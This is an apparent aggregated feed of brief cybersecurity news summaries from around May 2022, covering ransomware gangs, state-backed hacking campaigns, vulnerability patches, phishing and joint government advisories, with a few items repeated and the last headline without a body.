    Costa Rica has declared a national emergency following sustained cyber-attacks on government systems by the Russia-based Conti ransomware gang. The decree, signed by newly-elected President Rodrigo Chaves, is believed to be the first-ever response of this type by a government to a cyber-attack. Chaves described the attack, which took place on April 18, as an act of “cyber terrorism” .

    HP Fixes Bug Letting Attackers Overwrite Firmware in Over 200 Models

    HP has released BIOS updates today to fix two high-severity vulnerabilities affecting a wide range of PC and notebook products, which allow code to run with Kernel privileges. Kernel-level privileges are the highest rights in Windows, allowing threat actors to execute any command at the Kernel level, including manipulating drivers and accessing the BIOS.

    Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks.

    A ransomware group with an Iranian operational connection has been linked to a string of file-encrypting malware attacks targeting organizations in Israel, the U.S., Europe, and Australia. Cybersecurity firm Secureworks attributed the intrusions to a threat actor it tracks under the moniker Cobalt Mirage, which it said is linked to an Iranian hacking crew dubbed Cobalt Illusion (aka APT35, Charming Kitten, Newscaster, or Phosphorus)

    Massive Hacking Campaign Compromised Thousands of WordPress Websites - New resource in watched category

    Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites by injecting malicious JavaScript code that redirects visitors to scam content. According to Sucuri, at least 322 websites were compromised as a result of this new wave of attacks. The infections automatically redirect site visitors to third-party websites containing malicious content (i.e. phishing pages, malware downloads), scam pages, or commercial websites to generate illegitimate traffic.

    CISA Alert: Protecting Against Cyber Threats to Managed Service Providers and their Customers

    The cybersecurity authorities of the United Kingdom (NCSC-UK), Australia (ACSC), Canada (CCCS), New Zealand (NCSC-NZ), and the United States (CISA), (NSA), (FBI) are aware of recent reports that observe an increase in malicious cyber activity targeting managed service providers (MSPs) and expect this trend to continue.[1] This joint Cybersecurity Advisory (CSA) provides actions MSPs and their customers can take to reduce their risk of falling victim to a cyber intrusion. This advisory describes cybersecurity best practices for information and communications technology (ICT) services and functions, focusing on guidance that enables transparent discussions between MSPs and their customers on securing sensitive data. Organizations should implement these guidelines as appropriate to their unique environments, in accordance with their specific security needs, and in compliance with applicable regulations. MSP customers should verify that the contractual arrangements with their provider include cybersecurity measures in line with their particular security requirements.

    Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K - New resource in watched category

    A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K. Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low volume email-borne phishing campaign that started on April 26, 2022.

    New IceApple Exploit Toolset Deployed on Microsoft Exchange Servers - New resource in watched category

    Security researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography. IceApple is a highly sophisticated .NET-based framework that comes with at least 18 modules, each for a specific task, that help the attacker discover relevant machines on the network, steal credentials, delete files and directories, or exfiltrate valuable data. These modules run in memory, emphasizing the adversary’s priority of maintaining a low forensic footprint on the infected host.

    Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia - New resource in watched category

    An espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021. Cybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the Bitter APT based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.

    Threat Actors are Actively Exploiting CVE-2022-1388 RCE in F5 BIG-IP updated: CISA Tells Federal Agencies to Fix Actively Exploited F5 BIG-IP Bug

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new security vulnerability to its list of actively exploited bugs, the critical severity CVE-2022-1388 affecting BIG-IP network devices. F5 customers using BIG-IP solutions include governments, Fortune 500 firms, banks, service providers, and consumer brands (including Microsoft, Oracle, and Facebook), with the company claiming that "48 of Fortune 50 companies are F5 customers

    Hackers are Using Tech Services Companies as a 'Launchpad' for Attacks on Customers - New resource in watched category

    International cybersecurity agencies are urging IT service providers and their customers to take actions to protect themselves from the threat of supply chain attacks. The cybersecurity agencies warn that Russia's invasion of Ukraine has increased the risk of cyberattacks against organizations around the world. But they also suggest a number of actions that IT and cloud service providers, along with their customers, can take to protect networks from supply chain attacks, where attackers gain access to a company that provides software or services to many other companies. "As this advisory makes clear, malicious cyber actors continue to target managed service providers, which is why it's critical that MSPs and their customers take recommended actions to protect their networks," said Jen Easterly, director of US's Cybersecurity and Infrastructure Security Agency (CISA).

    Microsoft Patch Tuesday

    This month, Microsoft released patches for 75 vulnerabilities. Of these 74, 7 are critical (2 elevation of privilege and 5 remote code execution), 66 are important, and 1 is rated as low. There is one zero-day vulnerability (CVE-2022-26925) that has been publicly disclosed and exploited in the wild. Two other vulnerabilities (CVE-2022-22713 and CVE-2022-29972) have been publicly disclosed but not yet observed exploited in the wild.

    New REvil Samples Indicate Ransomware Gang is Back After Months of Inactivity

    The notorious ransomware operation known as REvil (aka Sodin or Sodinokibi) has resumed after six months of inactivity, an analysis of new ransomware samples has revealed. "Analysis of these samples indicates that the developer has access to REvil's source code, reinforcing the likelihood that the threat group has reemerged," researchers from Secureworks Counter Threat Unit (CTU) said in a report published Monday.

    Hacktivists Hacked Russian TV Schedules During Victory Day and Displayed Anti-war Messages

    Since Russia’s invasion of Ukraine, Hacktivists and white hat hackers have continued to support Ukraine by launching cyberattacks on Russian websites and infrastructure. In a recent attack, they defaced Russian TV with anti-war messages and took down the RuTube video streaming site. The attack took place during Russia’s Victory Day, Russians attempting to view the parade were displayed Pro-Ukraine messages due to a cyber attack that impacted the Russian TV listings systems. According to the BBC, the coordinated attack affected major Russian networks, including Channel One, Rossiya-1, MTS, Rostelecom, and NTV-Plus.

    Lincoln College to Close After 157 Years Due to Ransomware Attack

    Lincoln College, a liberal-arts school from rural Illinois, says it will close its doors later this month, 157 years since its founding and following a brutal hit on its finances from the COVID-19 pandemic and a recent ransomware attack. This decision was made even harder with the college having survived multiple disasters, including a major fire in 1912, the Spanish flu, the Great Depression, the World Wars, and the 2008 global financial crisis.

    US Government Offers $15m Reward for Info on Conti Actors

    The US authorities have offered a multimillion-dollar reward for information leading to the identification, arrest and/or conviction of individuals involved in attacks using the Conti ransomware variant. Offered under the Department of State’s Transnational Organized Crime Rewards Program (TOCRP), the money is split into two pots: up to $10m for information on the identity or location of individuals “who hold a key leadership position” in Conti; and up to $5m for info leading to the arrest or conviction of anyone conspiring to use the malware in attacks

    Cyber Attack Halts Production at Ag Equipment Maker AGCO Fendt

    A cyber attack has disrupted the operations of AGCO/Fendt, a major manufacturer of agricultural equipment, the company has acknowledged. AGCO/Fendt, headquartered in Duluth, Georgia, said in a statement to the Security Ledger that it was the subject of a cybersecurity incident that “has impacted some of our production facilities. We are working to address the issues. Our first priority is to restore those critical activities needed to keep farmers farming.” The company first acknowledged the attack on Thursday, May 5.

    GitHub Announces Mandatory 2FA for Code Contributors

    Code hosting platform GitHub on Wednesday said it would make it mandatory for software developers to use at least one form of two-factor authentication (2FA) by the end of 2023. The Microsoft-owned platform has been supporting 2FA for years and is allowing users to use physical and virtual security keys, Time-based One-Time Password (TOTP) authenticator apps, and SMS as a second form of authentication.

    Ukraine’s IT Army is Disrupting Russia's Alcohol Distribution

    Hacktivists operating on the side of Ukraine have focused their DDoS attacks on a portal that is considered crucial for the distribution of alcoholic beverages in Russia. DDoS (distributed denial of service) attacks are collective efforts to overwhelm servers with large volumes of garbage traffic and bogus requests, rendering them unable to serve legitimate visitors.

    Security Researchers: Here’s How the Lazarus Hackers Start Their Attacks

    The Lazarus hacking group is one of the top cybersecurity threats from North Korea, recently catching the attention of the US government for massive cryptocurrency heists. Now researchers at NCCGroup have pieced together a few of the tools and techniques Lazarus hackers have been using recently, including social engineering on LinkedIn, messaging US defense contractor targets on WhatsApp, and installing the malicious downloader LCPDot.

    Microsoft, Apple and Google Team Up on Passwordless Standard

    Some of the world’s biggest tech companies are throwing considerable weight behind a common passwordless sign-in standard that could finally signal the end of static credentials for many users. Apple, Microsoft and Google announced plans to support the FIDO Alliance and World Wide Web Consortium (W3C) standard, making it easier for websites and apps to deliver end-to-end passwordless authentication via fingerprint/face scan or device PIN.

    New Raspberry Robin Worm Uses Windows Installer to Drop Malware

    Red Canary researchers have discovered a new wormable Windows malware that spreads through USB drives. They have dubbed the malware Raspberry Robin and first observed the activity back in September 2021. Using detection tools on customer networks, Red Canary saw the malware spreading in the technology and manufacturing sectors.

    New NetDooka Malware Spreads via Poisoned Search Results

    A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device. This previously undocumented malware framework features a loader, a dropper, a protection driver, and a powerful RAT component that relies on a custom network communication protocol.

    New NetDooka Malware Spreads via Poisoned Search Results

    A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device. This previously undocumented malware framework features a loader, a dropper, a protection driver, and a powerful RAT component that relies on a custom network communication protocol.

    FBI says Business Email Compromise is a $43 Billion Scam

    The Federal Bureau of Investigation (FBI) said today that the amount of money lost to business email compromise (BEC) scams continues to grow each year, with a 65% increase in the identified global exposed losses between July 2019 and December 2021. From June 2016 until July 2019, IC3 received victim complaints regarding 241,206 domestic and international incidents, with a total exposed dollar loss of $43,312,749,946

    F5 Warns its Customers of Tens of Flaws in its Products

    F5 and US-CERT released security notifications this morning, warning of a handful of vulnerabilities in various products. In total the company addressed 43 vulnerabilities, the most severe being tracked as CVE-2022-1388. It received a CVSS scored of 9.8 and allows an unauthenticated attacker to exploit BIG-IP systems through the management port. Using the system they can execute arbitrary system commands, create or deleted files, or disable services.

    State-Backed Chinese Hackers Target Russia

    Financially motivated and state-sponsored actors around the globe continue to use the war in Ukraine as a lure for phishing campaigns, with Chinese groups targeting Russia of late, according to Google. The tech giant’s Threat Analysis Group (TAG) claimed in its new quarterly bulletin that the usual governments of China, Iran, North Korea and Russia were responsible for many of the attacks recorded over the period.

    Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies

    An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019. Dubbed "Operation CuckooBees" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information. Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America.

    Conti, Revil, Lockbit Ransomware Bugs Exploited to Block Encryption

    Hackers commonly exploit vulnerabilities in corporate networks to gain access, but a researcher has turned the table by finding exploits in the most common ransomware and malware being distributed today. Malware from notorious ransomware operations like Conti, the revived REvil, the newcomer Black Basta, the highly active LockBit, or AvosLocker, all came with security issues that could be exploited to stop the final and most damaging step of the attack, file encryption.

    Pro-Ukraine Hackers Use Docker Images to DDoS Russian Sites

    Docker images with a download count of over 150,000 have been used to run distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites managed by the government, military, and news organizations. Behind the incidents are believed to be pro-Ukrainian actors such as hacktivists, likely backed by the country's IT Army.

    Aruba and Avaya Network Switches Are Vulnerable to RCE Attacks

    Security researchers have discovered five vulnerabilities in network equipment from Aruba (owned by HP) and Avaya (owned by ExtremeNetworks), that could allow malicious actors to execute code remotely on the devices. The damage caused by a successful attack ranges from data breach and complete device takeover to lateral movement and overriding network segmentation defenses.

    Green - Chinese Cyber-espionage Group Moshen Dragon Targets Asian Telcos

    Researchers have identified a new cluster of malicious cyber activity tracked as Moshen Dragon, targeting telecommunication service providers in Central Asia. While this new threat group has some overlaps with "RedFoxtrot" and "Nomad Panda," including the use of ShadowPad and PlugX malware variants, there are enough differences in their activity to follow them separately.

    SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse

    Recorded Future’s Insikt Group continues to monitor Russian state-sponsored cyber espionage operations targeting government and private sector organizations across multiple geographic regions. From mid-2021 onwards, Recorded Future’s midpoint collection revealed a steady rise in the use of NOBELIUM infrastructure tracked by Insikt Group as SOLARDEFLECTION, which encompasses command and control (C2) infrastructure. In this report, we highlight trends observed by Insikt Group while monitoring SOLARDEFLECTION infrastructure and the recurring use of typosquat domains by its operators.

    UNC3524 APT Uses IP Cameras to Deploy Backdoors and Target Exchange

    Mandiant researchers discovered a new APT group, tracked as UNC3524, that heavily targets the emails of employees that focus on corporate development, mergers and acquisitions, and large corporate transactions. Once gained initial access to the target systems, UNC3524 deployed a previously unknown backdoor tracked by Mandiant researchers as QUIETEXIT. The QUIETEXIT backdoor borrows the code from the open-source Dropbear SSH client-server software. The threat actors deployed QUIETEXIT on network appliances within the target network, including load balancers and wireless access point controllers.

    Chinese "Override Panda" Hackers Resurface With New Espionage Attacks

    A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. "The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week. "The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country."

    Here's a New Tool That Scans Open-Source Repositories for Malicious Packages

    The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories. Called the Package Analysis project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the security of the software supply chain and increasing trust in open-source software.

    Russian Hackers Compromise Embassy Emails to Target Governments

    Security analysts have uncovered a recent phishing campaign from Russian hackers known as APT29 (Cozy Bear or Nobelium) targeting diplomats and government entities in Europe, the Americas, and Asia. The APT29 is a state-sponsored actor that focuses on cyberespionage and has been active since at least 2014. Its targeting scope is determined by current Russian geopolitical strategic interests.

    REvil Ransomware Returns: New Malware Sample Confirms Gang is Back

    “The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks”. The REvil ransomware group was shut down by law enforcement back in October of 2021. Various members of the group was arrested and their Tor servers were seized. There has been rumors that the groups Tor servers were back online, and this week we are seeing reports that their previous websites are now redirecting visitors to a new unnamed ransomware operation.

    Hackers Fool Major Tech Companies Into Handing Over Data of Women and Minors to Abuse

    Some major tech companies have unwittingly opened harassment and exploitation opportunities to the women and children who they have pledged to protect. This happened because they provided information in response to emergency data requests from legitimate law enforcement accounts that hackers had compromised. This finding came from four federal law enforcement agencies and a couple of industry investigators.

    EmoCheck Now Detects New 64-bit Versions of Emotet Malware

    The Japan CERT has released a new version of their EmoCheck utility to detect new 64-bit versions of the Emotet malware that began infecting users this month. Emotet is one of the most actively distributed malware spread through emails using phishing emails with malicious attachments, including Word/Excel documents, Windows shortcuts, ISO files, and password-protected zip files. The phishing emails use creative lures to trick users into opening the attachments, including reply-chain emails, shipping notices, tax documents, accounting reports, or even holiday party invites.

    FIN7 BadUSB

    The criminal group FIN7 has been mailing malware-ridden USBs to various entities in the transport, insurance, and defense industries under the guise that they originated from a trusted source, such as Amazon and the US Department of Health and Human Services. Those from the former were supposedly gift vouchers, while the latter claimed to include new COVID guidelines. FIN7’s badUSB attacks serve as a reminder of two key vulnerabilities present among all organizations.

    New Black Basta Ransomware Springs Into Action With a Dozen Breaches

    A new ransomware gang known as Black Basta has quickly catapulted into operation this month, breaching at least twelve companies in just a few weeks. The first known Black Basta attacks occurred in the second week of April, as the operation quickly began attacking companies worldwide. While ransom demands likely vary between victims, BleepingComputer is aware of one victim who received over a $2 million demand from the Black Basta gang to decrypt files and not leak data.

    Microsoft: Russia Has Launched Hundreds of Cyberattacks Against Ukraine

    Microsoft warns it saw six Russia-aligned, state-sponsored hacking groups launch over 237 cyberattacks against Ukraine starting in the weeks before Russia's February 24 invasion. Microsoft has released an in-depth report detailing how Russian cyberattacks against Ukraine were "strongly correlated" or "directly timed" with its military operations in the country.

    2021 Top Routinely Exploited Vulnerabilities

    CISA, the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have released a joint Cybersecurity Advisory that provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited. CISA encourages users and administrators to review joint Cybersecurity Advisory: 2021 Top Routinely Exploited Vulnerabilities and apply the recommended mitigations to reduce the risk of compromise by malicious cyber actors.

    Chinese State-Backed Hackers Now Target Russian State Officers

    Security researchers analyzing a phishing campaign targeting Russian officials found evidence that points to the China-based threat actor tracked as Mustang Panda (also known as HoneyMyte and Bronze President). The threat group was previously seen orchestrating intelligence collection campaigns against European targets, employing phishing lures inspired by the Russian invasion of Ukraine.

    Rig Exploit Kit Drops Redline Malware via Internet Explorer Bug

    Threat analysts have uncovered yet a new campaign that uses the RIG Exploit Kit to deliver the RedLine stealer malware. Exploit kits (EKs) have dropped drastically in popularity as they targeted vulnerabilities in web browsers introduced by plug-in software such as the now-defunct Flash Player and Microsoft Sillverlight.

    Russian Govt Impersonators Target Telcos in Phishing Attacks

    A previously unknown and financially motivated hacking group is impersonating a Russian agency in a phishing campaign targeting entities in Eastern European countries. The phishing emails pretend to come from the Russian Government’s Federal Bailiffs Service and are written in the Russian language, with the recipients being telecommunication service providers and industrial firms in Lithuania, Estonia, and Russia.

    North Korean Hackers Targeting Journalists With Novel Malware

    North Korean state-sponsored hackers known as APT37 have been discovered targeting journalists specializing in the DPRK with a novel malware strain. The malware is distributed through a phishing attack first discovered by NK News, an American news site dedicated to covering news and providing research and analysis about North Korea, using intelligence from within the country.

    Security Teams Should Be Addressing Quantum Cyber-Threats Now

    Addressing quantum cyber-threats should already be a high priority for cybersecurity professionals, according to Duncan Jones, head of cybersecurity at Quantinuum, speaking during the ISC2 Secure Webinar ‘The Threat and Promise of Quantum Cybersecurity. Jones began by emphasizing the significant differences between quantum and classical computing, both in operations and possibilities. One of the most significant of these is that while classical computers only have binary choices, 0 or 1, quantum computers are made up of ‘qubits,’ which “can have values that are combinations of 0 and 1.” This mixture is known as a ‘superposition.’ This enables calculations to be made in parallel. In addition, qubits can be connected, which provides the opportunity to model aspects of nature in their entirety. This aspect offers enormous potential in fields like drug discovery, where testing could be simulated rather than requiring lengthy and expensive trials.

    Quantum Ransomware Seen Deployed in Rapid Network Attacks

    The Quantum ransomware, a strain first discovered in August 2021, was seen carrying out speedy attacks that escalate quickly, leaving defenders little time to react. The threat actors are using the IcedID malware as one of their initial access vectors, which deploys Cobalt Strike for remote access and leads to data theft and encryption using Quantum Locker.

    Crooks Spoofing Credit Unions to Steal Funds and Login Credentials

    Email security provider Avanan revealed in a Thursday report that a new phishing campaign exploits local credit unions to steal money and data. According to Avanan’s research, phishing emails are masqueraded as legit messages from high-profile companies/businesses. They are sent to lure the recipient into sharing login credentials and sensitive data of the spoofed company.

    Quantum Ransomware Seen Deployed in Rapid Network Attacks

    The Quantum ransomware, a strain first discovered in August 2021, was seen carrying out speedy attacks that escalate quickly, leaving defenders little time to react. The threat actors are using the IcedID malware as one of their initial access vectors, which deploys Cobalt Strike for remote access and leads to data theft and encryption using Quantum Locker.

    New Powerful Prynt Stealer Malware Sells for Just $100 per Month

    Threat analysts have spotted yet another addition to the growing space of info-stealer malware infections, named Prynt Stealer, which offers powerful capabilities and extra keylogger and clipper modules. Prynt Stealer targets a large selection of web browsers, messaging apps, and gaming apps and can also perform direct financial compromise.

    French Hospital Group Disconnects Internet After Hackers Steal Data

    The GHT Coeur Grand Est. Hospitals and Health Care group has disconnected all incoming and outgoing Internet connections after discovering they suffered a cyberattack that resulted in the theft of sensitive administrative and patient data. GHT is a hospital network located in Northeast France consisting of nine locations, 6,000 employees, and approximately 3,370 beds.

    Russian Hackers are Seeking Alternative Money-laundering Options

    Due to government sanctions, law enforcement action, and the takedown of popular dark web markets, the Russian cybercriminals are looking for alternative means to carry out money-laundering activities. As pressure from law enforcement mounts, cybercriminals will need to be more creative when withdrawing stolen funds and cryptocurrency. ”First came the bank sanctions and the blocking of SWIFT payments, a result of the Russian invasion of Ukraine. This crippled the regular channels for cash flows used by cybercriminals. Then came the suspension of Russian operations of direct money transfer services such as Western Union and MoneyGram. Scammers and extortionists typically used those to receive payments from victims without revealing their real identity. On April 5, the servers of Hydra Market, the largest Russian darknet platform, were seized by the German police, taking down a massive business (over $1.35 billion annual turnover) that also sustained money-laundering services. The following day, the U.S. sanctioned Garantex, one of the most important platforms Russian cybercriminals used for laundering stolen funds, which followed a wave of sanctions on similar platforms starting in 2021. Finally, Binance became the first large cryptocurrency exchange to essentially ban Russian users from performing transactions or investments, and more are expected to follow soon. Even coin mining operations of significant size in Russia are being sanctioned.

    Atlassian Fixes Critical Jira Authentication Bypass Vulnerability

    Atlassian has published a security advisory to alert that its Jira and Jira Service Management products are affected by a critical authentication bypass vulnerability in Seraph, the company's web application security framework. Seraph is used in Jira and Confluence for handling all login and logout requests via a system of pluggable core elements.

    Docker Servers Hacked in Ongoing Cryptomining Malware Campaign

    Docker APIs on Linux servers are being targeted by a large-scale Monero crypto-mining campaign from the operators of the LemonDuck botnet. Docker is a platform for building, running and managing containerized workloads. Docker provides a number of APIs to help developers with automation, and these APIs can be made available using local Linux sockets or daemons.

    TeamTNT targeting AWS, Alibaba

    Cisco Talos has recently received modified versions of the TeamTNT cyber crime group's malicious shell scripts, an earlier version of which was detailed by Trend Micro. The malware author modified tools after they became aware that security researchers published the previous version of scripts. The scripts are primarily designed to target Amazon Web Services (AWS) but could also run in on-premise, container or other forms of Linux instances. They have the ability to mine cryptocurrency, maintain persistence, lateral movement, remote access, and defense evasion. The threat actors used a bash script to collect information on targeted instances, some scripts (GRABBER_aws_cloud.sh) will not execute if specific hostnames are detected on the targeted machine, this is check is completed to avoid the installation of malware on the authors own systems. The script then checks API’s for credentials that can be used to execute additional scripts, approximately 17 in total. Researchers noted that, “TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools .

    North Korea Funding Nuclear Program with Cyber Activity

    A United Nations expert on North Korea has said the country is funding its banned nuclear and missile programs with cyber activity. Eric Penton-Voak, a coordinator of the UN group tasked with monitoring the enforcement of sanctions on North Korea, made the comment on Wednesday and called for increased focus on cybercrime stemming from the country.

    Critical Bug in Android Could Allow Access to Users’ Media Files

    Security analysts have found that Android devices running on Qualcomm and MediaTek chipsets were vulnerable to remote code execution due to a flaw in the implementation of the Apple Lossless Audio Codec (ALAC). ALAC is an audio coding format for lossless audio compression that Apple open-sourced in 2011. Since then, the company has been releasing updates to the format, including security fixes, but not every third-party vendor using the codec applies these fixes.

    Emotet Botnet Grows in Size and Activity

    Kaspersky experts have detected significant growth in complex malicious spam emails targeting organizations in various countries. These emails are being distributed as part of a coordinated campaign that aims to spread Qbot and Emotet – two notorious banking Trojans that function as part of botnet networks. Both malware instances are capable of stealing users’ data, collecting data on an infected corporate network, spreading further in the network, and installing ransomware or other Trojans on other devices in the network. One of the functions of Qbot is also to access and steal emails.

    FBI: BlackCat Ransomware Breached at Least 60 Entities Worldwide

    The Federal Bureau of Investigation (FBI) says the Black Cat ransomware gang, also known as ALPHV, has breached the networks of at least 60 organizations worldwide between November 2021 and March 2022. The FBI's Cyber Division revealed this in a TLP:WHITE flash alert released on Wednesday in coordination with the Cybersecurity and Infrastructure Security Agency (DHS/CISA)

    Joint CSA: Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure

    We have closely followed the cyber landscape during the Russia and Ukraine conflict. Reporting today suggests that Russia has been using new malware variants in recent attacks in addition to previous DDoS and wiper attacks on Ukrainian infrastructure in previous campaigns. A joint advisory was released a few moments ago from the cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom. It was released to warn organizations that Russia’s invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity from Russian state-sponsored cyber actors or Russian-aligned cybercrime groups.

    Emotet Botnet Switches to 64-bit modules, Increases Activity

    The Emotet malware is having a burst in distribution and is likely to soon switch to new payloads that are currently detected by fewer antivirus engines. Security researchers monitoring the botnet are observing that emails carrying malicious payloads last month have increased tenfold. According to Kaspersky, the number of phishing emails distributed by Emotet operators from February to March increased from 3,000 to 30,000 emails.

    Russian State Hackers Hit Ukraine With New Malware Variants

    Threat analysts report that the Russian state-sponsored threat group known as Gamaredon (a.k.a. Armageddon/Shuckworm) is launching attacks against targets in Ukraine using new variants of the custom Pteredo backdoor. Gamaredon has been launching cyber-espionage campaigns targeting the Ukrainian government and other critical entities since at least 2014. The actor is known for its strong focus on Ukraine, being attributed over 5,000 cyberattacks against 1,500 public and private entities in the country.

    Google Project Zero Detects a Record Number of Zero-Day Exploits in 2021

    Google Project Zero called 2021 a "record year for in-the-wild 0-days," as 58 security vulnerabilities were detected and disclosed during the course of the year. The development marks more than a two-fold jump from the previous maximum when 28 zero-day exploits were tracked in 2015. In contrast, only 25 zero-day exploits were detected in 2020. "The large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits," Google Project Zero security researcher Maddie Stone said.

    Okta: Just Two Customers Impacted by Lapsus Breach

    Okta has revealed that just two of its customers were affected by an incident in January in which threat actors compromised a third-party vendor’s workstation. The authentication specialist completed its investigation into the events that took place between January 16 and 21 this year, when it was believed that a hacker from the Lapsus group gained access to back-end systems. Previously, Okta estimated that 366 customers may have had their tenants accessed by the attackers via a Sitel support engineer’s machine.

    Lenovo Patches UEFI Firmware Vulnerabilities Impacting Millions of Users

    Lenovo has patched a trio of bugs that could be abused to perform UEFI attacks. Discovered by ESET researcher Martin Smolár, the vulnerabilities, assigned as CVE-2021-3970, CVE-2021-3971, and CVE-2021-3972, could be exploited to "deploy and successfully execute UEFI malware either in the form of SPI flash implants like LoJax or ESP implants like ESPecter" in the Lenovo Notebook BIOS.

    Kaspersky Releases a Free Decryptor for Yanluowang Ransomware

    Researchers from Kaspersky discovered a vulnerability in the encryption process of the Yanluowang ransomware that can be exploited to recover the files encrypted by the malware without paying the ransom. The Yanluowang ransomware was first spotted by researchers from Symantec Threat Hunter Team in October 2021 after the malware was used in highly targeted attacks against large enterprises.

    LinkedIn Brand Takes Lead as Most Impersonated In Phishing Attacks

    Security researchers are warning that LinkedIn has become the most spoofed brand in phishing attacks, accounting for more than 52% of all such incidents at a global level. The data comes cybersecurity company Check Point, who recorded a dramatic uptick in LinkedIn brand abuse in phishing incidents in the first quarter of this year.

    North Korean State-Sponsored APT Targeting Blockchain Companies

    The U.S. government has observed North Korean cyber actors targeting a variety of organizations in the blockchain technology and cryptocurrency industry, including cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens (NFTs).

    Pegasus Spyware Targeted UK Prime Minister, Say Researchers

    A notorious spyware variant linked to multiple state-backed campaigns was used to target the UK Prime Minister’s Office over the past two years, researchers have revealed. Over recent years, Canadian non-profit Citizen Lab has been heavily involved in tracking the use of the Pegasus spyware produced by Israel’s NSO Group. The firm is being sued by both WhatsApp and Apple after customers of the tech giants were targeted by the covert malware. It was also used to compromise the iPhones of nine US State Department officials, it emerged late last year.

    GitHub: Attacker Breached Dozens of Orgs Using Stolen OAuth Tokens

    GitHub revealed Friday that an attacker is using stolen OAuth user tokens (issued to two third-party integrators, Heroku and Travis-CI) to download data from private repositories. Since this campaign was first spotted on April 12, 2022, the threat actor has already accessed and stolen data from dozens of victim organizations using Heroku and Travis-CI-maintained OAuth apps, including npm.

    Researchers Share In-Depth Analysis of PYSA Ransomware Group

    An 18-month-long analysis of the PYSA ransomware operation has revealed that the cybercrime cartel followed a five-stage software development cycle from August 2020, with the malware authors prioritizing features to improve the efficiency of its workflows. This included a user-friendly tool like a full-text search engine to facilitate the extraction of metadata and enable the threat actors to find and access victim information quickly.

    T-Mobile Customers Warned of Unblockable SMS Phishing Attacks

    An ongoing phishing campaign is targeting T-Mobile customers with malicious links using unlockable texts sent via SMS (Short Message Service) group messages. The New Jersey Cybersecurity & Communications Integration Cell (NJCCIC) issued a warning after multiple customers have filed reports of being targeted by this new SMS phishing (smishing) campaign.

    Industrial Spy, a New Stolen Data Market Is Advertised via Adware and Cracks

    Industrial Spy is an online marketplace that sells information stolen from compromised organizations while also "spoiling" its customers with stolen data that's free of charge. Unlike traditional stolen data marketplaces, where data is used to extort enterprises and threaten them with GDPR fines, Industrial Spy promotes itself as a marketplace where organizations can buy their rival companies' data to gain access to trade classified information, manufacturing diagrams, accounting reports, and client databases. This newer and lesser-known marketplace offers different tiers of data offerings, with "premium" stolen data packages costing millions of dollars and lower-tier data that can be bought as individual files for as little as $2. An image sample from Bleeping Computer displays Industrial Spy selling an Indian company's data in their premium category for $1.4 million in Bitcoins.

    New SolarMarker Malware Variant Using Updated Techniques to Stay Under the Radar

    Cybersecurity researchers have disclosed a new version of the SolarMarker malware that packs in new improvements with the goal of updating its defense evasion abilities and staying under the radar. "The recent version demonstrated an evolution from Windows Portable Executables (EXE files) to working with Windows installer package files (MSI files)," Palo Alto Networks Unit 42 researchers said in a report published this month. "This campaign is still in development and going back to using executables files (EXE) as it did in its earlier versions.

    ‘Mute’ Button in Conferencing Apps May Not Actually Mute Your Mic

    A new study shows that pressing the mute button on popular video conferencing apps (VCA) may not actually work like you think it should, with apps still listening in on your microphone. More specifically, in the studied software, pressing mute does not prevent audio from being transmitted to the apps' servers, either continually or periodically.

    Karakurt Revealed as Data Extortion Arm of Conti Cybercrime Syndicate

